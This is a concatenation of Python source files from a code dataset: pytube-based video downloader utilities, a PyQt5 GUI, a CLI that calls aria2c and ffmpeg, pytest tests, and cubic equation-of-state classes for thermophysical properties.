:param s: Url address.
:type s: string
:param charset: The target charset for the URL if the url was
given as unicode string. Default is 'utf-8'.
:type charset: string
:rtype: string
(taken from `werkzeug.utils <http://werkzeug.pocoo.org/docs/utils/>`_)
'''
if sys.version_info < (3, 0) and isinstance(s, str):
s = s.encode(charset, 'ignore')
scheme, netloc, path, qs, anchor = urllib.parse.urlsplit(s)
path = urllib.parse.quote(path, '/%')
qs = urllib.parse.quote_plus(qs, ':&=')
return urllib.parse.urlunsplit((scheme, netloc, path, qs, anchor))
def progress_bar(progress, length=20):
'''
Returns a textual progress bar.
>>> progress_bar(0.6)
'[##########--------]'
:param progress: Number between 0 and 1 describes the progress.
:type progress: float
:param length: The length of the progress bar in chars. Default is 20.
:type length: int
:rtype: string
'''
length -= 2 # The brackets are 2 chars long.
if progress < 0:
progress = 0
if progress > 1:
progress = 1
return "[" + "#"*int(progress*length) + "-"*(length-int(progress*length)) + "]"
def is_HTTPRange_supported(url, timeout=15):
'''
Checks if a server allows `Byte serving <https://en.wikipedia.org/wiki/Byte_serving>`_,
using the Range HTTP request header and the Accept-Ranges and Content-Range HTTP response headers.
:param url: Url address.
:type url: string
:param timeout: Timeout in seconds. Default is 15.
:type timeout: int
:rtype: bool
'''
url = url.replace(' ', '%20')
fullsize = get_filesize(url)
if not fullsize:
return False
headers = {'Range': 'bytes=0-3'}
req = urllib.request.Request(url, headers=headers)
urlObj = urllib.request.urlopen(req, timeout=timeout)
filesize = int(urlObj.headers["Content-Length"])
urlObj.close()
return (filesize != fullsize)
def get_filesize(url, timeout=15):
'''
Fetches file's size of a file over HTTP.
:param url: Url address.
:type url: string
:param timeout: Timeout in seconds. Default is 15.
:type timeout: int
:returns: Size in bytes.
:rtype: int
'''
# url = url_fix(url)
try:
urlObj = urllib.request.urlopen(url, timeout=timeout)
except (urllib.error.HTTPError, urllib.error.URLError) as e:
return 0
try:
file_size = int(urlObj.headers["Content-Length"])
except (IndexError, KeyError, TypeError):
return 0
return file_size
def get_random_useragent():
'''
Returns a random popular user-agent.
Taken from `here <http://techblog.willshouse.com/2012/01/03/most-common-user-agents/>`_, last updated on 04/01/2017.
:returns: user-agent
:rtype: string
'''
l = [
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0',
'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14',
'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0.2 Safari/602.3.12',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'
]
return random.choice(l)
def sizeof_human(num):
'''
Human-readable formatting for filesizes. Taken from `here <http://stackoverflow.com/questions/1094841/reusable-library-to-get-human-readable-version-of-file-size>`_.
>>> sizeof_human(175799789)
'167.7 MB'
:param num: Size in bytes.
:type num: int
:rtype: string
'''
unit_list = list(zip(['B', 'kB', 'MB', 'GB', 'TB', 'PB'], [0, 0, 1, 2, 2, 2]))
if num > 1:
exponent = min(int(log(num, 1024)), len(unit_list) - 1)
quotient = float(num) / 1024**exponent
unit, num_decimals = unit_list[exponent]
if sys.version_info >= (2, 7): # python2.7 supports comma seperators
format_string = '{:,.%sf} {}' % (num_decimals)
return format_string.format(quotient, unit)
else: # with python2.6, we have to do some ugly hacks
if quotient != int(quotient): # real float
x, y = str(quotient).split('.')
x = re.sub("(\d)(?=(\d{3})+(?!\d))", r"\1,", "%d" % int(x))
y = y[:num_decimals]
quotient = "%s.%s" % (x, y) if y else x
return "%s %s" % (quotient, unit)
else:
quotient = re.sub("(\d)(?=(\d{3})+(?!\d))", r"\1,", "%d" % quotient)
return "%s %s" % (quotient, unit)
if num == 0:
return '0 bytes'
if num == 1:
return '1 byte'
def time_human(duration, fmt_short=False):
'''
Human-readable formatting for timing. Based on code from `here <http://stackoverflow.com/questions/6574329/how-can-i-produce-a-human-readable-difference-when-subtracting-two-unix-timestam>`_.
>>> time_human(175799789)
'6 years, 2 weeks, 4 days, 17 hours, 16 minutes, 29 seconds'
>>> time_human(589, fmt_short=True)
'9m49s'
:param duration: Duration in seconds.
:type duration: int
:param fmt_short: Format as a short string (`47s` instead of `47 seconds`)
:type fmt_short: bool
:rtype: string
'''
duration = int(duration)
if duration == 0:
return "0s" if fmt_short else "0 seconds"
INTERVALS = [1, 60, 3600, 86400, 604800, 2419200, 29030400]
if fmt_short:
NAMES = ['s'*2, 'm'*2, 'h'*2, 'd'*2, 'w'*2, 'y'*2]
else:
NAMES = [('second', 'seconds'),
('minute', 'minutes'),
('hour', 'hours'),
('day', 'days'),
('week', 'weeks'),
('month', 'months'),
('year', 'years')]
result = []
for i in range(len(NAMES)-1, -1, -1):
a = duration // INTERVALS[i]
if a > 0:
result.append( (a, NAMES[i][1 % a]) )
duration -= a * INTERVALS[i]
if fmt_short:
return "".join(["%s%s" % x for x in result])
return ", ".join(["%s %s" % x for x in result])
def create_debugging_logger():
'''
Creates a debugging logger that prints to console.
:rtype: `logging.Logger` instance
'''
t_log = logging.getLogger('pySmartDL')
t_log.setLevel(logging.DEBUG)
console = logging.StreamHandler()
console.setLevel(logging.DEBUG)
# console.setFormatter(logging.Formatter('[%(levelname)s@%(thread)d] %(message)s'))
console.setFormatter(logging.Formatter('[%(levelname)s] %(message)s'))
t_log.addHandler(console)
return t_log
class DummyLogger(object):
'''
A dummy logger. You can call `debug()`, `warning()`, etc on this object, and nothing will happen.
'''
def __init__(self):
pass
def dummy_func(self, *args, **kargs):
pass
def __getattr__(self, name):
if name.startswith('__'):
return object.__getattr__(name)
return self.dummy_func
class ManagedThreadPoolExecutor(futures.ThreadPoolExecutor):
'''
Managed Thread Pool Executor. A subclass of ThreadPoolExecutor.
'''
def __init__(self, max_workers):
futures.ThreadPoolExecutor.__init__(self, max_workers)
self._futures = []
def submit(self, fn, *args, **kwargs):
future = super(ManagedThreadPoolExecutor, self).submit(fn, *args, **kwargs)
self._futures.append(future)
return future
def done(self):
return all([x.done() for x in self._futures])
def get_exceptions(self):
l = []
for x in self._futures:
if x.exception():
l.append(x.exception())
return l
``` |
{
"source": "jjisnow/pytube",
"score": 3
} |
#### File: pytube/pytube/downloader_gui.py
```python
import os
from PyQt5 import QtGui
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import *
from pytube import downloader
class MagicWizard(QWizard):
def __init__(self, parent=None):
super(MagicWizard, self).__init__(parent)
self.addPage(url_page(self))
self.addPage(itag_page(self))
self.addPage(final_path_page(self))
self.setWindowTitle("Pytube GUI Downloader")
self.setWindowIcon(
QtGui.QIcon(
os.path.join("..", "images", "rooster.png")
))
# self.resize(640,480)
class url_page(QWizardPage):
def __init__(self, parent=None):
super(url_page, self).__init__(parent)
self.setTitle("Choose video link")
self.setSubTitle("Please input a URL to download")
layout = QVBoxLayout()
self.myTextBox = QLineEdit(self)
self.myTextBox.setAlignment(Qt.AlignLeft)
self.registerField("TextBox", self.myTextBox)
layout.addWidget(self.myTextBox)
self.setLayout(layout)
class itag_page(QWizardPage):
def __init__(self, parent=None):
super(itag_page, self).__init__(parent)
self.setTitle("Choose itag")
self.setSubTitle("Choose an itag corresponding to a video or audio stream")
layout = QVBoxLayout()
self.label1 = QLabel()
layout.addWidget(self.label1)
hbox = QHBoxLayout()
layout.addLayout(hbox)
self.label2 = QLabel()
hbox.addWidget(self.label2, alignment=Qt.AlignLeft)
self.itag_box = QLineEdit()
self.registerField("iTag*", self.itag_box)
hbox.addWidget(self.itag_box)
self.setLayout(layout)
def initializePage(self):
tb = self.field("TextBox")
self.label2.setText("itag: ")
itag_descr = downloader.downloader(tb, "--list")
font = self.label1.font()
self.label1.setFont(QtGui.QFont("Courier", 6, QtGui.QFont.Medium))
self.label1.setText(itag_descr)
class final_path_page(QWizardPage):
def __init__(self, parent=None):
super(final_path_page, self).__init__(parent)
layout = QVBoxLayout()
self.label1 = QLabel()
layout.addWidget(self.label1)
self.setLayout(layout)
def initializePage(self):
tb = self.field("TextBox")
itag = self.field("iTag")
final_path = downloader.downloader(tb, "--itag", itag, "-v")
self.label1.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.label1.setText(f"Final output file: \'{final_path}\'")
if __name__ == '__main__':
import sys
app = QApplication(sys.argv)
wizard = MagicWizard()
wizard.show()
sys.exit(app.exec_())
```
#### File: pytube/pytube/downloader.py
```python
import datetime
import math
import os
import shutil
import sys
from functools import wraps
from pprint import pformat
import time
import pysrt
from pytube import YouTube
import subprocess
from pathlib import Path
import logging
from docopt import docopt
from tabulate import tabulate
from typing import Union
def timing(fn):
'''Timing decorator for program - calculates runtime'''
@wraps(fn)
def wrap(*args, **kw):
time_start = time.time()
result = fn(*args, **kw)
time_end = time.time()
run_secs = time_end - time_start
date_secs = datetime.datetime.utcfromtimestamp(run_secs)
run_time = date_secs.time()
logging.info(f'function:{fn.__name__} args:[{args}, {kw}]')
logging.info(f' --- {run_time.isoformat(timespec="milliseconds")} secs --- ')
return result
return wrap
@timing
def downloader(*args: tuple):
''' main interface for downloader file
'''
arguments = parse_arguments(args)
config_loggers(arguments)
arguments = check_url(arguments)
check_requirements('aria2c', 'ffmpeg')
for file in arguments['URL']:
logging.debug(f"Parsing url: {file}")
yt = YouTube(file)
streams = yt.streams
stream_table = parse_streams(streams)
if arguments['--list']:
return stream_table
itag = get_itag(arguments)
target_stream = streams.get_by_itag(itag)
logging.info("DOWNLOADING:")
video_path, audio_path, subtitle_path, video_fps = [None] * 4
if not target_stream.includes_audio_track:
logging.info("downloading video first......")
video_path = download_file(target_stream,
args=arguments,
)
video_fps = target_stream.fps
logging.info("downloading audio as well!")
audio_target = streams.filter(only_audio=True).first()
audio_path = download_file(audio_target,
args=arguments,
)
else:
logging.info(f"downloading {target_stream.type} ONLY")
if target_stream.type == 'video':
video_path = download_file(target_stream,
args=arguments,
)
video_fps = target_stream.fps
elif target_stream.type == 'audio':
audio_target = target_stream
audio_path = download_file(audio_target,
args=arguments,
)
else:
logging.critical(
f"unexpected file type: {target_stream.type}")
return 1
# need to retime the captions if I'm to use them in shorter videos
if not target_stream.type == 'audio':
subtitle_path = download_captions(yt, lang=arguments['--lang'],
duration=arguments['--duration'],
start=arguments['--start'])
# In the event only audio, create HQ mp3 or aac file
if target_stream.type == 'audio':
if (audio_path.suffix == '.webm' and target_stream.audio_codec == 'opus') \
or (
audio_path.suffix == '.mp4' and 'mp4' in target_stream.audio_codec):
final_path = make_mp3(audio_path) # the default
# final_fp = make_aac(audio_path) # not supported by all platforms
# final_fp = make_ogg(audio_path) # not supported by all platforms
else:
final_path = mux_files(audio_path)
else:
final_path = mux_files(audio_path, video_path, subtitle_path, video_fps)
cleanup_files(audio_path, video_path, subtitle_path)
logging.info(f"Final output file: {final_path}")
return final_path
def parse_arguments(args: tuple) -> dict:
'''set arguments dictionary from supplied arguments'''
arguments = docopt(__doc__, argv=args, help=True)
if arguments['--verbose']:
log_level = logging.DEBUG
elif arguments['--quiet']:
log_level = logging.CRITICAL
else:
log_level = logging.INFO
arguments['log_level'] = log_level
return arguments
def config_loggers(args: dict) -> None:
""" displays the supplied arguments to stdout before switching back to
the stderr handler
:param args:
:param log_level:
:return:
"""
log_level = args['log_level']
logging.basicConfig(level=log_level)
logger = logging.getLogger()
# These lines are needed to create a stdout handler
# stdout_handler = logging.StreamHandler(stream=sys.stdout)
# stdout_handler.setLevel(log_level)
# logger.addHandler(stdout_handler)
#
# root_handler = logger.handlers[0]
# root_handler.setLevel(log_level)
# logger.removeHandler(root_handler)
logging.info(f"Supplied args: \n {args}")
# logger.removeHandler(stdout_handler)
# logger.addHandler(root_handler)
def check_url(args: dict) -> dict:
''' parse the url and obtain one if none provided
Use a provided link or the args provided
'''
while len(args['URL']) == 0:
link = input("Provide a youtube link to download: ")
args['URL'].append(link)
if args['URL'][0] == '':
print("a link must be supplied!")
del args['URL'][0]
logging.info(f"Final args: {args}")
return args
def check_requirements(*args) -> None:
'''ensure executables supplied exist on the file system'''
logging.debug(f'Requirements: {args}')
for arg in args:
status = shutil.which(f'{arg}')
if status is not None:
logging.debug(f'Requirement: {arg} met with {status}')
else:
logging.error(f'Requirement: {arg} not met! status: {status}')
raise Exception(f'Requirement: {arg} not met! status: {status}')
def parse_streams(streams) -> str:
'''
take yt.streams.all() and print it as a table for viewing
'''
final_list = []
for stream in streams:
stream = str(stream).strip('<>').replace('Stream: ', '').split(' ')
stream_dict = {}
for item in stream:
a = item.split('=')
k = a[0]
v = a[1].strip('"')
stream_dict[k] = v
final_list.append(stream_dict)
stream_table = tabulate(final_list, headers="keys")
print(stream_table)
return stream_table
def get_itag(args: dict) -> int:
while True:
if args['--itag']:
itag = args['--itag']
break
try:
itag = int(input("Which stream do you want? (specify itag): "))
break
except ValueError:
logging.error("you need to provide a number!")
return itag
def download_file(download_target, args: dict = (), ) -> Path:
'''download stream given a download_target (a stream object either audio or video,
captions are handled separately).
args['duration'] and args['start'] are used to specify time dimensions
Note that ffmpeg already has a HH:MM:SS.ms specification limited to 2 digits for
HH, MM and SS
'''
logging.debug(f"current directory: {Path.cwd()}")
logging.info(f"Downloading itag: {download_target.itag}")
logging.info(f"Download url: {download_target.url}")
download_path = Path(download_target.default_filename)
# set local defaults for arguments passed
args = dict(args)
duration = args.get('--duration', None)
start = args.get('--start', '0')
download_path = Path(f"{download_path.stem}-{download_target.type}{download_path.suffix}")
logging.debug(f"Targeting destination: {download_path}")
if duration:
# download the file with ffmpeg
# -ss : start point to download in HH:MM:SS.MILLISECONDS format if needed
# -t : duration to download in seconds
# -to: end point to download as above format. -t takes precedence
# NB: -ss before -i sets the -to origin to zero at the cut point
# -copyts: allows -to to refer to start of clip, no the cut point.
# removed individual codec copy encode commands because keyframes need
# to match downloaded time.
logging.debug(f"attempting to download {duration} seconds of file")
cmd = (f'ffmpeg',
'-y',
'-ss', f'{start}',
'-i', f'{download_target.url}',
'-t', f'{duration}',
'-c', 'copy',
f'{download_path}')
else:
# download the entire file with aria
# -c : continue/resume downloads
# -j : number of parallel downloads for 1 link
# --optimize-concurrent-downloads=true: optimise speed
# -x : max connections per server
# -k : min split size
# -s, --split=N: Download using N connections
cmd = ('aria2c',
'--continue=true',
'-j5', '-x5',
'--optimize-concurrent-downloads=true',
'-k', '1M',
'--split=5',
'-o', f'{download_path}',
f'{download_target.url}')
logging.debug(f"Command to be run: {cmd}")
subprocess.run(cmd, shell=False, check=True)
logging.info(f"Final {download_target.type} file: {download_path}")
return download_path
def download_captions(yt: YouTube, lang: str = 'English',
duration: str = None, start: str = None) -> Union[Path, None]:
i = None
caption_list = list(yt.captions.lang_code_index.values())
captions = enumerate(caption_list)
captions_string = pformat(captions)
logging.debug(f'captions available: {captions_string}')
for index, c in captions:
logging.debug(f'{index} index: {c} caption')
if lang in str(c):
i = index
logging.debug(f'found {lang} captions at index {i}')
break
if i is None:
logging.debug(f'No {lang} Captions found!')
return None
subt_base = Path(yt.fmt_streams[0].default_filename).stem
subt_fp = Path(f'{subt_base}-captions.srt')
if os.path.exists(subt_fp):
logging.info(f'File {subt_fp} exists already!! Deleting')
os.remove(subt_fp)
logging.debug(f'Writing {subt_fp}')
lines = yt.caption_tracks[i].generate_srt_captions()
subt_fp.write_text(lines, encoding='utf-8')
# retime the subtitles
if start or duration:
logging.info(f'retiming subtitles {subt_fp}')
subs = pysrt.open(subt_fp)
if start:
start = float(strp_time(start))
subs.shift(seconds=-math.trunc(start),
milliseconds=-math.trunc((start % 1) * 1000))
part = subs.slice(starts_after={'milliseconds': -1})
if duration:
duration = float(strp_time(duration))
part = part.slice(ends_before={'seconds' : math.trunc(duration),
'milliseconds': math.trunc(
(duration % 1) * 1000)})
if len(part) < 1:
logging.info(f'No valid subtitles left, removing {subt_fp} file')
os.remove(subt_fp)
return None
part.save(subt_fp)
return subt_fp
def strp_time(time_str: str) -> str:
''' returns corrected number of seconds given a variation of HH:MM:SS.milliseconds string'''
if ':' not in time_str:
return time_str
else:
secs = 0
time_parts = time_str.split(':')
for i, n in enumerate(reversed(time_parts)):
secs += 60 ** i * float(n)
return str(secs)
def mux_files(audio_path: Path, video_path: Path = None,
subt_path: Path = None, video_fps: str = None) -> Path:
'''mux file streams supplied'''
logging.info("attempting to mix audio and video")
# -y: global ie overwrite without asking
# -i: input file
# -r: set frame rate in fps
# -filter:a create filtergraph
# -c:a copy means copy audio streams
# -c:v copy means copy video stream codec
# -c:s srt means copy subtitles as srt
# -filter:a aresample=async=1 means resample audio to fit frame rates
if video_path:
# removes "-video" from name end
if video_path.stem.endswith('-video'):
final_path = Path(video_path.stem[:-6]).with_suffix(video_path.suffix)
elif audio_path:
# leaves "-audio" on end for only audio files
final_path = audio_path
else:
logging.error("no audio or video file path supplied")
# Using '.mkv' to handle subtitles for time being
final_path = Path(f'{final_path.stem}-output.mkv')
audio_path_text = ('-i', f'{audio_path}') if audio_path else ()
video_path_text = ('-i', f'{video_path}') if video_path else ()
subt_path = () if subt_path is None else ('-i', f'{subt_path}')
subt_extension = ('-c:s', 'srt') if subt_path else ()
video_fps_text = ('-r', f'{video_fps}') if video_fps else ()
if final_path.is_file():
logging.error(f"{final_path} already exists! Will overwrite...")
cmd = ('ffmpeg',
'-y',
*audio_path_text,
*video_path_text,
*subt_path,
*video_fps_text,
'-c:a', 'copy',
'-c:v', 'copy',
*subt_extension,
f'{final_path}')
logging.debug(f"Command to be run: {cmd}")
subprocess.run(cmd, shell=False, check=True)
logging.info(f"Final muxed file: {final_path}")
return final_path
def cleanup_files(audio_path: Path = None, video_path: Path = None, subtitle_path: Path = None, ) -> None:
'''cleanup file paths supplied'''
logging.info("CLEANUP:")
for k, v in {'audio' : audio_path,
'video' : video_path,
'subtitles': subtitle_path}.items():
if v:
logging.info(f"CLEANUP: deleting {k} file: {v}")
# check for errors
errors = os.remove(v)
if not errors:
logging.info("Success!")
else:
logging.error(f"Error code detected: {errors}")
else:
logging.debug(f'CLEANUP: no {k} file detected')
def check_audio_path(audio_path, suffix='.mp3'):
logging.debug(f"current directory: {Path.cwd()}")
fp = audio_path.with_suffix(suffix)
logging.debug(f"Targeting destination: {fp}")
if fp.is_file():
logging.error(f"{fp} already exists! Will overwrite...")
return fp
def make_mp3(audio_path: Path) -> Path:
'''convert from a webm file to an mp3'''
fp = check_audio_path(audio_path, suffix='.mp3')
# convert the file
# -i : input file name
# -c:a libmp3lame : create mp3 file using lame codec
# -q:a 0 : highest variable audio quality
# -n : exit immediately if file exists
# -y : overwrite output files without asking
cmd = ('ffmpeg',
'-y',
'-i', f'{audio_path}',
'-c:a', 'libmp3lame',
'-q:a', '0',
f'{fp}')
logging.debug(f"Command to be run: {cmd}")
subprocess.run(cmd, shell=False, check=True)
return fp
def make_ogg(audio_path: Path) -> Path:
'''convert from a webm file to an ogg'''
fp = check_audio_path(audio_path, suffix='.ogg')
# convert the webm -> ogg
# -c:a copy : use the same audio codec
# -n : exit immediately if file exists
# -y : overwrite output files without asking
cmd = ('ffmpeg',
'-y',
'-i', f'{audio_path}',
'-c:a', 'libopus',
'-b:a', '160k',
f'{fp}')
logging.debug(f"Command to be run: {cmd}")
subprocess.run(cmd, shell=False, check=True)
return fp
def make_aac(audio_path: Path) -> Path:
'''convert from a file to an aac'''
fp = check_audio_path(audio_path, suffix='.aac')
# convert the file
# -i : input file name
# -c:a aac : create aac file
# -q:a 0 : highest variable audio quality
# -profile:a aac_ltp : Long term prediction profile, is enabled by and will enable
# the aac_ltp option. Introduced in MPEG4.
# -n : exit immediately if file exists
# -y : overwrite output files without asking
cmd = ('ffmpeg',
'-y',
'-i', f'{audio_path}',
'-c:a', 'aac',
'-q:a', '0',
'-profile:a', 'aac_main',
f'{fp}')
logging.debug(f"Command to be run: {cmd}")
subprocess.run(cmd, shell=False, check=True)
return fp
if __name__ == '__main__':
downloader(*sys.argv[1:])
```
#### File: pytube/tests/test_downloader.py
```python
import math
import os
import subprocess
from pathlib import Path
import pytest
from pytube import downloader
@pytest.fixture()
def base_command():
return ' '.join((
"python",
os.path.join("..", "pytube", "downloader.py"),
"-v",
))
@pytest.fixture
def wildlife_clip(base_command):
# uses a short 30s wildlife clip
url = "https://www.youtube.com/watch?v=5DP5I8Gd6wY"
command = " ".join((base_command,
url,
))
return command
@pytest.fixture
def calm_owl_clip(base_command):
# 6 second calm owl clip
url = "https://www.youtube.com/watch?v=FBgLytbB-uE"
command = " ".join((base_command,
url,
))
return command
@pytest.fixture
def captions(base_command):
# youtube close caption demo
url = "https://www.youtube.com/watch?v=QRS8MkLhQmM"
command = " ".join((base_command,
url,
))
return command
def check_expected(base_command, downloaded_expected, itag, size_expected):
if downloaded_expected.is_file():
os.remove(downloaded_expected)
cmd = base_command + f" -i {str(itag)} -d 1"
subprocess.run(cmd, shell=False)
if all((downloaded_expected.is_file(),
math.isclose(downloaded_expected.stat().st_size, size_expected,
rel_tol=0.01))):
os.remove(downloaded_expected)
assert True
else:
print(f'Size not correct. Expected {size_expected}, ' \
f'Got {downloaded_expected.stat().st_zize}')
assert False
@pytest.mark.parametrize("args, expected", [
(('aria2c', 'ffmpeg', 'ffprobe'), None)
])
def test_downloader_check_requirements(args, expected):
assert downloader.check_requirements(*args) == None
@pytest.mark.parametrize("args", [
('blah_not_executable',)
])
def test_downloader_check_requirements_bad(args):
with pytest.raises(Exception):
downloader.check_requirements(args)
def test_list(wildlife_clip):
assert subprocess.run(wildlife_clip + " -l", shell=False)
def test_audio(wildlife_clip):
# test for audio file only
downloaded_expected = Path(
"Short wildlife video clip HD-audio.mp3")
itag = 249
size_expected = 27117
check_expected(wildlife_clip, downloaded_expected, itag, size_expected)
# def test_combined(wildlife_clip):
# # test for low quality video file download
# downloaded_expected = Path("Short wildlife video clip HD-output.mkv")
# itag = 278
# size_expected = 37274
# check_expected(wildlife_clip, downloaded_expected, itag, size_expected)
def test_hq_combined(calm_owl_clip):
# test for high quality combined video file
downloaded_expected = Path("Calm Owl-output.mkv")
itag = 22
size_expected = 161909
check_expected(calm_owl_clip, downloaded_expected, itag, size_expected)
# def test_audio_captions(captions):
# # test for audio file only
# base_command = captions
# downloaded_expected = Path(
# "YouTube Captions and Subtitles-audio.mp3")
# itag = 249
# size_expected = 4365
# check_expected(base_command, downloaded_expected, itag, size_expected)
# def test_combined_captions(captions):
# # test for low quality video file muxing
# base_command = captions
# downloaded_expected = Path("YouTube Captions and Subtitles-output.mkv")
# itag = 278
# size_expected = 21955
# check_expected(base_command, downloaded_expected, itag, size_expected)
def test_hq_mux(captions):
# test for high quality combined video file
base_command = captions
downloaded_expected = Path("YouTube Captions and Subtitles-output.mkv")
itag = 243
size_expected = 25147
check_expected(base_command, downloaded_expected, itag, size_expected)
def test_non_safe_file_title(base_command):
url = "https://www.youtube.com/watch?v=BpaYqFd5S5c"
base_command = " ".join((base_command,
url,
))
itag = 278
cmd = base_command + f" -i {str(itag)} -d 1"
downloaded_expected = Path(
'Adam Savages New One Day Builds T-Shirt!-output.mkv')
if downloaded_expected.is_file():
os.remove(downloaded_expected)
exit_code = subprocess.run(cmd, shell=False)
os.remove(downloaded_expected)
assert exit_code.returncode == 0
``` |
{
"source": "j-jith/equations-of-state",
"score": 3
} |
#### File: equations-of-state/pythermophy/cubic_eos.py
```python
from __future__ import print_function, division
import numpy as np
from .cubic_parent import CubicEOS
class RedlichKwong(CubicEOS):
"""
Redlich-Kwong equation of state.
For details see https://www.e-education.psu.edu/png520/m10_p4.html
:param fluid: a :class:`~pythermophy.fluid.Fluid` instance
:return: an :class:`~pythermophy.parent_class.EOS` instance
"""
def __init__(self, fluid):
self.p_crit = fluid.p_crit # Pa
self.T_crit = fluid.T_crit # K
self.a0 = 0.42748 * self.R**2 * self.T_crit**2 / self.p_crit
b1 = 0.08664 * self.R * self.T_crit / self.p_crit
super(RedlichKwong, self).__init__(b1, 0., b1, 0., fluid)
def get_a(self, T):
"""
Returns the temperature dependent coefficient :math:`a(T)`.
"""
Tr = T/self.T_crit
return self.a0/Tr**0.5
def get_diff_a_T(self, T):
"""
Returns the derivative of coefficient :math:`a(T)` wrt. temperature :math:`T`.
"""
Tr = T/self.T_crit
return -0.5*self.a0/T/Tr**0.5
def get_double_diff_a_T(self, T):
"""
Returns the second derivative of coefficient :math:`a(T)` wrt. temperature :math:`T`.
"""
Tr = T/self.T_crit
return 0.75*self.a0/T**2/Tr**0.5
class SoaveRedlichKwong(CubicEOS):
"""
Soave-Redlich-Kwong equation of state.
For details see: https://www.e-education.psu.edu/png520/m10_p5.html
:param fluid: a :class:`~pythermophy.fluid.Fluid` instance
:return: an :class:`~pythermophy.parent_class.EOS` instance
"""
def __init__(self, fluid):
self.acentric = fluid.acentric
self.p_crit = fluid.p_crit # Pa
self.T_crit = fluid.T_crit # K
self.a0 = 0.42748 * self.R**2 * self.T_crit**2 / self.p_crit
b1 = 0.08664 * self.R * self.T_crit / self.p_crit
self.kappa = 0.48508 + 1.55171*self.acentric - 0.15613*self.acentric**2
super(SoaveRedlichKwong, self).__init__(b1, 0., b1, 0., fluid)
def get_a(self, T):
"""
Returns the temperature dependent coefficient :math:`a(T)`.
"""
Tr = T/self.T_crit
alpha = (1 + self.kappa*(1 - Tr**0.5))**2
return alpha * self.a0
def get_diff_a_T(self, T):
"""
Returns the derivative of coefficient :math:`a(T)` wrt. temperature :math:`T`.
"""
Tr = T/self.T_crit
alpha0 = (1 + self.kappa*(1 - Tr**0.5))
return -(self.a0*self.kappa/T)*Tr**0.5 * alpha0
def get_double_diff_a_T(self, T):
"""
Returns the second derivative of coefficient :math:`a(T)` wrt. temperature :math:`T`.
"""
Tr = T/self.T_crit
alpha0 = (1 + self.kappa*(1 - Tr**0.5))
return (0.5*self.a0*self.kappa**2/T**2)*Tr + (0.5*self.a0*self.kappa/T**2)*Tr**0.5 * alpha0
class PengRobinson(CubicEOS):
"""
Peng-Robinson equation of state.
For details see: https://www.e-education.psu.edu/png520/m11_p2.html
:param fluid: a :class:`~pythermophy.fluid.Fluid` instance
:return: an :class:`~pythermophy.parent_class.EOS` instance
"""
def __init__(self, fluid):
self.acentric = fluid.acentric
self.p_crit = fluid.p_crit # Pa
self.T_crit = fluid.T_crit # K
self.a0 = 0.45724 * self.R**2 * self.T_crit**2 / self.p_crit
b1 = 0.07780 * self.R * self.T_crit / self.p_crit
self.kappa = 0.37464 + 1.54226*self.acentric - 0.26992*self.acentric**2
super(PengRobinson, self).__init__(b1, 0., 2*b1, -b1**2, fluid)
def get_a(self, T):
"""
Returns the temperature dependent coefficient :math:`a(T)`.
"""
Tr = T/self.T_crit
alpha = (1 + self.kappa*(1 - Tr**0.5))**2
return alpha * self.a0
def get_diff_a_T(self, T):
"""
Returns the derivative of coefficient :math:`a(T)` wrt. temperature :math:`T`.
"""
Tr = T/self.T_crit
alpha0 = (1 + self.kappa*(1 - Tr**0.5))
return -(self.a0*self.kappa/T)*Tr**0.5 * alpha0
def get_double_diff_a_T(self, T):
"""
Returns the second derivative of coefficient :math:`a(T)` wrt. temperature :math:`T`.
"""
Tr = T/self.T_crit
alpha0 = (1 + self.kappa*(1 - Tr**0.5))
return (0.5*self.a0*self.kappa**2/T**2)*Tr + (0.5*self.a0*self.kappa/T**2)*Tr**0.5 * alpha0
```
#### File: equations-of-state/pythermophy/ideal_gas.py
```python
from __future__ import division, print_function
from .parent_class import EOS
class IdealGas(EOS):
"""
Ideal gas equation of state.
:param fluid: a :class:`~pythermophy.fluid.Fluid` instance
:return: an equation of state (:class:`~pythermophy.parent_class.EOS`) instance
"""
def __init__(self, fluid):
super(IdealGas, self).__init__(fluid)
def get_isothermal_compressibility(self, T, p, **kwargs):
"""
Returns the isothermal compressibility of an ideal gas
:param T: temperature (K) [only required for consistency with the
same function for other classes; not used in computation]
:type T: float
:param p: pressure (Pa)
:type p: float
:return: isothermal compressibility (1/Pa)
:rtype: float
"""
return 1/p
``` |
{
"source": "jjj4x/dbsg",
"score": 2
} |
#### File: dbsg/lib/intermediate_representation.py
```python
from __future__ import annotations
from dataclasses import dataclass, field
from typing import MutableSequence, Union, Optional
